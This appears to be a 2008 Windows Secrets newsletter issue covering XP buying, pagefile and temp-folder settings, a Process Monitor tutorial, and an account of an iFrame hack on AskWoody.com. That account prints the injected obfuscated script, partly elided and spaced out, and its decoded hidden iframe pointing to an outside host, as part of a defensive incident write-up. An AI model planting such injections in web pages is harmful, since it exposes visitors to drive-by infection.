Get yourself an XP system while you still can

Get yourself an XP system while you still can

By Scott Dunn With Windows XP scheduled to disappear from store shelves on June 30, time is running out to buy a computer with that venerable OS preinstalled. As manufacturers stop producing XP drivers, finding hardware that still supports XP is becoming a challenge, but I’ve produced one last shopping guide for you before the clock runs out.

An approach to tackling the XP shopping dilemma

Microsoft’s widely used Windows XP operating system had a stay of execution a few months ago, when the Redmond company announced that it would continue sales of that OS through June 30, 2008. Sales had previously been scheduled to end in January 2008. But the new, June deadline doesn’t leave much time for those who don’t like Vista, but need to buy new hardware and want XP as their operating system.

To be sure, your license to use XP does allow you to remove the OS from an old machine and install it on a new one. But, as hardware manufacturers direct more resources to Windows Vista, it may be harder to find drivers for video, audio, and other computer components that support the older OS.

In addition to extending the XP sales deadline, Microsoft has also stated that buyers of Vista Business and Vista Ultimate can “downgrade” to Windows XP Professional, XP Professional x64 Edition, and Microsoft Windows XP Tablet PC Edition, as reported in a Computerworld article and elsewhere.

When you buy a new computer, participating companies may (a) include a copy of XP in the box, (b) include a special “downgrade disk,” which I’ll describe below, or (c) make you buy XP through a completely separate ordering process. It’s the manufacturer’s choice, not yours.

For the moment, however, you do still have some options if you want XP instead of Vista. You can buy a computer with XP preinstalled or make sure that a Vista computer you buy comes with an XP downgrade disk.

How to buy a system with XP preinstalled

Believe it or not, most major computer manufacturers still offer systems with XP preinstalled. (The only exception, as seen in Table 1, is Gateway.) If XP comes standard on a new machine, you’re pretty much guaranteed to have a system with all the necessary XP drivers up and running.

If you choose this option, here are some tips I uncovered during my research:

• Online shopping offers you a better chance of finding an XP system (or a system that comes with an XP downgrade disk) than going to your local superstore.

• It’s getting harder to find desktop computers that come with XP preinstalled. You’ll have a greater variety of choices if you shop for an XP notebook instead.

• In general, a Web site’s home-user or small-office computers will not offer the best selection of XP machines, if the site shows any models at all in this market segment. It’s very likely that you’ll want to shop in the business division of a manufacturer’s site.

How to use the ‘downgrade disc’ option

For the best of both worlds, consider buying a system that has Vista preinstalled but comes with a downgrade disc, often called an XP recovery disc. Using a recovery disc wipes out a PC’s existing operating system and everything else that was on the boot partition, but that’s exactly what many people with Vista aversion want.

This is not the same as a manufacturer simply tossing a copy of Windows XP into the box a PC comes in. A truly useful XP downgrade disc is a recovery disc of XP, complete with all the necessary drivers. (Such a recovery disc will probably include some crapware programs, too, which is par for the course.)

In many cases, a PC with an XP downgrade disc will also include another disc with an image of the Vista operating system, in case you want to switch from XP back to Vista. If a Vista disc isn’t included, make an image backup or a Vista recovery disc before downgrading, as described in a recent TechRepublic article.

I recommend avoiding Vista systems that merely come with a vanilla XP install disc (or the option to order one). This is the most you can expect from Dell systems, for instance.

Simply having an XP license does not guarantee that drivers are available for all the devices in your new computer. Even if working drivers can be found online, you’ll have to go looking for them, as Dell notes on its instruction page for its manual downgrade process. Fortunately for Dell fans, the company still sells a wide variety of machines with XP preinstalled.

Some systems — like those from Acer, Fujitsu, HP, and Sony — include a downgrade disc in the box for some qualifying systems. Others, like Lenovo, expect you to order the disc separately for an additional charge.

Because downgrade discs that include drivers are specific to a computer system or model series, these discs are generally available only for specific models. Don’t expect a company that has downgrade discs to supply them for just any system they sell.

Finding out which systems come with a downgrade disc isn’t always easy. A few sites, such as Fujitsu’s, have a page listing the model numbers that come with upgrade discs. In the case of Acer, you’ll have to make an educated guess. You then contact either Acer or an Acer reseller, state the model number you’re interested in, and inquire whether a downgrade disc is included.

The following table shows the availability of XP on various machines:

Table 1. Most manufacturers still have XP options, at least for now. (• = Yes)

Be aware that the information in this article is subject to change by the computer manufacturers at any time. Confirm your desired options before making a purchase, and remember: the clock is ticking.

Readers receive a gift certificate for a book, CD, or DVD of their choice for sending tips we print. Send us your tips via the Windows Secrets contact page.

Scott Dunn is associate editor of the Windows Secrets Newsletter. He has been a contributing editor of PC World since 1992 and currently writes for the Here’s How section of that magazine.

Sizing up your boot drive's pagefile

By Scott Dunn

My Feb. 28 article discussed ways to save space on your Windows drive when you have multiple hard drives or partitions.

You can save even more space by shrinking the Windows pagefile on the boot disk, as long as you don’t care about preserving some complex debugging data.

On that subject, reader Doug McRae has these observations:

• “I’ve been building PCs (as a hobby) for a number of years, and have always installed two hard disk drives in new builds. … I put a small pagefile on each partition, setting each to a 150 to 500MB size. This allows for a small debug dump when the PC crashes.

  “After reading your lead article, I changed the pagefile size on this XP install (c:) to “system managed size,” and rebooted. I just checked the c: partition and it’s showing the pagefile size as 3.67GB!

  “Though I’m not concerned about the size, as c: is a 100GB partition, I am concerned about it causing fragmentation. I’m going to change it back to the 150 to 500MB size, as it has worked well for me in the past.”

Doug has a good point. If your goal is to save space on your boot drive (which is usually c:), using the “system managed size” for the pagefile is not going to free up much space.

Fortunately, Windows lets you decide how big this file should be. Instead of selecting System managed size, select Custom size. Then enter the initial and maximum sizes and click Set.

A bigger question is how large to make this file.

Windows needs a pagefile on its boot partition that’s large enough for a debugging file called a memory dump. A dump file, however, contains highly technical information that’s useful only to system administrators and very advanced users.

A 2MB pagefile is enough for Windows to write out the minimum amount of information necessary to help an expert identify the problem. You can create a pagefile this small on your boot partition, and then add a larger pagefile on a different drive for code swapping to improve performance.

If you decide to make your boot-disk pagefile this small, you’ll need to follow these steps:

Step 1. Press WindowsKey+R (Win+R) to open the Run dialog box.

Step 2. Vista only: Type SystemPropertiesAdvanced and press Enter.

Step 3. XP only: Type control sysdm.cpl and press Enter. Click the Advanced tab.

Step 4. In both Vista and XP, click Settings under Startup and Recovery.

Step 5. In the Startup and Recovery dialog box, choose Small memory dump (64KB) under Write debugging information. You can also change the path of Dump file to a partition other than c: to save space, if desired.

Step 6. Click OK, and then click Yes to acknowledge the warning on minimum pagefile size. Follow any screen prompts as you close the remaining dialog boxes.

If you are a systems administrator or advanced user, you can choose another option under Write debugging information, but you’ll need a substantially larger pagefile to do the job. Microsoft’s advice here is inconsistent. For example, a warning pops up in Windows to advise you that a kernel memory dump requires a pagefile of at least 200MB. But Knowledge Base article 307973 advises a much larger size.

For the full scoop on configuring your system for failure and recovery, I recommend reading Microsoft’s entire KB article.

More ways to save space on your Windows drive

Doug’s e-mail goes on to point out another way to save space on your system drive if you have multiple disks or partitions. On his triple-boot system, he’s changed the location for system temp files to a single location. Here are the steps:

Step 1. Create a folder, perhaps named mytemp, on a partition or local drive that all versions of Windows on your computer can access.

Step 2. Press Win+R to open the Run dialog box.

Step 3. Vista only: Type SystemPropertiesAdvanced and press Enter.

Step 4. XP only: Type control sysdm.cpl and press Enter. Click the Advanced tab.

Step 5. In both Vista and XP, click Environment Variables at the bottom of the System Properties dialog box.

Step 6. In the list at the top of the dialog box, select the TEMP variable and click Edit.

Step 7. In the Variable value box, type the path to the new folder you created (for example, d:mytemp). Click OK.

Step 8. Repeat steps 6 and 7 for a different variable named TMP.

Step 9. If you have more than one version of Windows on your system, boot to the other version and repeat steps 1 through 8.

Reader Doug McRae will receive a gift certificate for a book, CD, or DVD of his choice for sending tips we printed. Send us your tips via the Windows Secrets contact page.

The art of water-balloon tossing

What was it about throwing water balloons as a kid that was so appealing? Throwing them at each other, your pets, moving cars. It was thrilling! Would it explode? How would your target react? Not to mention the ever-pressing question of how full could you actually get your balloon. In this video sponsored by Schweppes sparkling water, the mystery and intrigue of the water balloon has been turned into an art form. The entire clip was shot at 10,000 frames per second, capturing all of the magnificent impact on film. Play the video

Hackers broke into my site — yours might be next

By Woody Leonhard Last week, somebody using a Russian Internet address stuck a line of unwanted HTML code — an iFrame exploit — on the AskWoody.com main page, and my life suddenly got very complicated. It could happen to you: once the province of propeller heads and tech terrorists, hacking Web sites has become as easy as running a kiddie script.

What makes the iFrame exploit so dangerous

Chances are good that you’ve heard about iFrame attacks, even if you don’t understand the details.

Back in 2004, a Web advertising service unwittingly placed infected iFrames on its customers’ Web sites, as described in a forum post at the time. That exploit, known as the Bofra zero-day iFrame worm, infected thousands of PCs before Microsoft finally patched Internet Explorer 6 to close the hole.

In June 2007, more than 10,000 pages in Italy were infected with malicious iFrames, including government and tourist sites, according to an analysis by Sophos, a security firm.

Perhaps most notoriously, in November 2007, Monster.com got hit with an iFrame exploit that led the company to temporarily shut down a big part of its operation, according to a CastleCops article.

IFrames may sound sinister, but they aren’t. An iFrame allows a Web page designer to stick an external piece of content somewhere inside a Web page. When a designer creates an iFrame on a Web page, the < i frame > tag tells the browser how much room it must reserve for the embedded page, and points the browser to the location of the content. (I’m placing spaces in the tag here, so corporate filters don’t mistakenly think this article is infected.)

When a browser sees an < i frame > tag, the desired space is set aside. The browser then runs back out to the Internet to pull down and display whatever content has been embedded.

If you think about it for a second, you realize that iFrames are a good way to serve up advertising banners on a page. They’re also used in myriad other ways, many of which are fine, while others are not conducive to your PC’s good health.

Internet Explorer has, over the years, had no end of problems with iFrame exploits. Microsoft security bulletins MS99-042, MS00-033, MS01-020, MS02-023, MS04-013, and MS04-040 all patch various types of iFrame security holes. Firefox has had its own problems as well, according to Mozilla Foundation security advisory 2007-02.

The anatomy of a real-world iFrame attack

The offensive iFrame tag that someone stuck on the bottom of my main page looked like gibberish — but then it’s supposed to. Give or take some spaces that I’ve tossed in, the code looked like this:

< script > document. write(un escape(%3c %73 %63 %72 %69 %70 %74 %3e %64 %6f %63 %75 %6d %65 %6e %74 %2e %77 %72 %69 %74 %65 %28 %53 %74 %72 %69 %6e %67 %2e %66 %72 %6f %6d %43 %68 %61 %72 %43 %6f %64 %65 %28 %36 %30 %2c %31 %30 %35 %2c %31 %30 %32 %2c %31 %31 %34 %2c %39 %37 %2c %31 %30 %39 %2c … [lots and lots of numbers here] … %31 %30 %31 %2c %36 %32 %29 %29 %3b %3c %2f %73 %63 %72 %69 %70 %74 %3e’)) < / script >

If you deobfuscate the code, a technique explained in a PDF presentation by Jose Nazario, Ph.D., it looks like this (spaces added to protect the innocent):

< i frame src=”http://mynick.cn / spl / index.php” width=1 height=1 style=”visibility:hidden”> < / i frame>

Translating that into English, this surreptitious code tells your Web browser to set aside one invisible pixel for the frame, and then fill this tiny square by pulling content from a Web site in China. Kinda ominous, eh?

I tried to visit the site to see what payload it delivered. By the time I got there, however, the URL redirected to some car-fanatic site in Russia. Now it’s just plain dead.

Chances are mighty good that the original Mynick.cn site pumped out some sort of iFrame attack. Anyone running an older, unpatched version of Internet Explorer 6 could’ve been infected just by viewing my main page.

Most of the people visiting AskWoody.com use Firefox or IE 7, not IE 6, so I doubt anyone got bit. But you have to wonder how many other infected sites out there are happily pushing rootkits and keyloggers, compliments of a long-plugged security hole in Internet Explorer. Sophos recently published a PDF report stating that the firm discovers 6,000 new, infected Web pages a day. The most common type of infection? An iFrame exploit.

The long-term consequences of the infection

To this day I don’t know — and I probably never will know — how the cracker broke into my site. Chances are good that he (and it’s probably a “he”) gleaned my username and password from one of a very small circle of people who worked on the site, although there are many other possibilities.

The logs kept by my site’s hosting company aren’t sufficiently detailed to determine precisely when the page was hacked. I first heard about the problem when a friend posted a message saying that AVG Free Resident Shield had detected a threat on the page. About 18 hours later, Google sent me a series of automated notices saying, “We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.”

Figure 1. Google displayed this strident warning.

Searchers who clicked Google’s “may harm your computer” link were greeted by an even-more-dire message that discouraged them from proceeding. In the end, Google won’t even let you click through to such a site: you must actually cut and paste the address into your browser.

Soon after receiving the Google notification, I went through the Google process to request that AskWoody appear unfettered in search results. That was a week ago. My site has gone from a PageRank of 5 to 3 on a scale of 10 in the past week, and Google still hasn’t lifted the warning. Arrrrrrrgh! In the interim, even though the site is once again squeaky-clean, people using Google to find AskWoody.com have to work through some very scary messages. Most give up.

How the hacker managed to pull this off

Not long ago, planting this kind of iFrame exploit on a Web page took a considerable amount of knowledge and at least a modicum of skill. Back then, a cracker’s toolkit called MPack handled most of the dirty work. Symantec calls MPack “an FTP updater client, written in PHP language, that runs on a webserver with MySQL as back-end. It takes as input a list of website administrator accounts (possibly obtained in the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.”

We’ve come a long way, baby.

The latest super Web cracker, called NeoSploit 2, makes injecting malicious iFrames into Web pages almost kiddie-script easy. The primary stumbling block? Coming up with usernames and passwords for the Web sites. And therein lies an, uh, opportunity of the financial kind.

Security research firm Finjan recently discovered a program that works with NeoSploit 2 to trade valid usernames and passwords. The February 2008 issue of Finjan’s “Malicious Page of the Month” claims that more than 8,700 Web site usernames and passwords, which can be used to feed NeoSploit 2 directly, are up for sale at this very moment.

“Among the stolen accounts are highly respected organizations, such as government, financial services, leading suppliers in the technology industry and even prominent security vendors,” Finjan says.

What to do to protect your site and yourself

If you have a Web site, change your password. Right now. Use a good, strong password. And change it again every few days.

Use different usernames and passwords for different kinds of accounts. If you have a cPanel login and an FTP login, don’t use the same username and password on both accounts!

Most Web hosting companies keep their servers patched and up-to-date, but it doesn’t hurt to prod them from time to time. Usernames and passwords have long been harvested from sites that are hosted by companies that didn’t keep their systems patched. Any hosting company that doesn’t keep strict control over its /etc/shadow folder is begging for trouble.

In some cases, software running on a shared server under one user’s account has been known to infect another user’s account. Usernames and passwords get harvested that way, too.

Windows Secrets contributing editor Susan Bradley points out that Apache servers, such as the one AskWoody.com uses, can suffer from vulnerabilities in an add-on called cPanel 10.x that have been documented by Secunia. However, she continues, the cause of the iFrame attacks is the subject of varying reports by Channel Register and the cPanel site itself, which denies that weaknesses in its control panel are responsible.

Most of all, be aware of the fact that it can happen to you. If you get a message from Google that your site has been compromised, get it fixed immediately. Then pray that Google goes back to normal quickly. You may have better luck than I did.

Woody Leonhard‘s latest books — Windows Vista All-In-One Desk Reference For Dummies and Windows Vista Timesaving Techniques For Dummies — explore what you need to know about Vista in a way that won’t put you to sleep. He and Ed Bott also wrote the encyclopedic Special Edition Using Office 2007.

Use Process Monitor to find hidden information

By Ryan Russell I’m finishing my Process Monitor (PM) series with a couple of examples of the kinds of behind-the-scenes information you can get by using it. Remember that the best feature of PM is that it catches transitory events that you might never see, even if you time things perfectly with some tool that only shows you your PC’s current state.

A bit of fun: snooping on Apple’s Software Update

This column is the third in my series on Process Monitor, a free utility by Mark Russinovich and Bryce Cogswell, which was acquired by and is now being distributed by Microsoft. My previous two columns appeared on Jan. 17 and Feb. 7, 2008.

I mentioned Apple Software Update briefly in my Apr. 26, 2007, column on QuickTime. Software Update is the tool that Apple provides for updating its Windows software, including Safari, iTunes, and QuickTime. Like many self-update programs and tools, it’s designed for use on one machine at a time, by someone sitting in front of a PC. That’s fine, if that’s your situation, and if Software Update is working correctly.

Other people may have slightly different needs. For example, you might have three machines in the house, and you don’t want to download 100MB or so more than once. Apple Software Update gets you halfway there.

If you select Tools, Download Only, it will download the files and not install them. This is fine if you want to predownload a large file or set of files to install later on one machine — but something is missing. The tool doesn’t tell you where it put the files it downloaded.

This is where Process Monitor comes in handy. Sure, you can probably find a Web page somewhere that tells you where the files disappeared to, and I’ll tell you in a second myself. But the point is to learn how to do this with an arbitrary problem, not just this particular one.

Fire up PM, exclude the noise (as I showed you in my Feb. 7 column), and then run Apple’s updater. There will be a point after the initial blast of files where PM shows Software Update repeatedly writing to a file over a period of time. This is the download.

In my case, Software Update was writing to:

C:Documents and SettingsDefaultLocal SettingsTemporary Internet FilesContent.IE5PHL9WRNCSafari[1].msi

That’s Internet Explorer’s temporary files location. Looking both at the beginning of this download and at the end, I see references to the final location of the file:

C:Documents and SettingsDefaultLocal SettingsApplication DataAppleApple Software UpdateSafari.msi

Bingo! Now I can move those Microsoft Installer (.msi) files to another machine, deploy them using my company’s software distribution tool, and so forth. (Note: my username is Default. Where that string appears in the paths shown above, the directory name will likely be different for you.)

Figuring out how TweakUI does its magic

To give you another example of how you can use PM to uncover the inner workings of programs, you may be familiar with the Microsoft PowerToy named TweakUI. (PowerToys for XP can be downloaded free from Microsoft’s XP download page.)

TweakUI gives you an easy interface for tweaking many of the little preferences whose settings are scattered throughout the vast landscape that is Windows. For this illustration, I’ve decided that I want to find out where the first Desktop icon setting is stored.

In TweakUI, you would select Desktop, First Icon. You’d then see a radio button choice between My Documents and My Computer. You decide that the correct answer, of course, is My Computer. You want to know how to enforce that choice across an entire set of computers.

Fire up PM, filter out the noise again, and run TweakUI. Go to the appropriate TweakUI window, and then switch back to PM.

To reduce even further what you need to look at, you can pull down PM’s Edit menu and click Clear Display (or press Ctrl+X) to clear anything you’ve captured before the current moment. Then, in TweakUI, set the button to My Computer, and click Apply. Switch back to PM and select File, Capture Events (Ctrl+E) to stop capturing new events.

What you have in PM now is a list of everything TweakUI just did. Unfortunately, it’s not terribly short. TweakUI appears to have hit a large number of Registry settings — seemingly, almost all the ones it know how to tweak.

If you look carefully in PM’s Operation column, almost all of the events are “read” operations. Only one was a write (using RegSetValue). On my Windows XP system, the write affected the following Registry value:

HKCRCLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}SortOrderIndex

I suppose you would have had no trouble guessing without PM where TweakUI was storing this value, right?

Familiarize yourself before you need these tricks

While I gave you a couple of specific examples here, my hope is that I’ve provided you with enough information to start exploring on your own. You will have your own mysteries you’re trying to solve, and you’ll want to know the ways that your systems are configured. Having a mental model of what programs are running most of the time makes a huge difference when you’re trying to troubleshoot a new problem.

I find that the best way to master the power of PM is to explore when I’m not having a problem. This allows me to set a mental baseline of what is going on.

To be sure, it’s a constantly moving target. You can hardly get your system up to date or use the Web without triggering a cascade of new software, such as Flash, Java, Microsoft Installer, .NET, Silverlight, and so on. But knowing what was going on before the newcomers were installed will allow you to identify any new items, helping you to focus on a much shorter list.

The Perimeter Scan column gives you the facts you need to test your systems to prevent weaknesses. Ryan Russell is quality assurance manager at BigFix Inc., a configuration management company. He moderated the vuln-dev mailing list for three years under the alias “Blue Boar.” He was the lead author of Hack-Proofing Your Network, 2nd Ed., and the technical editor of the Stealing the Network book series.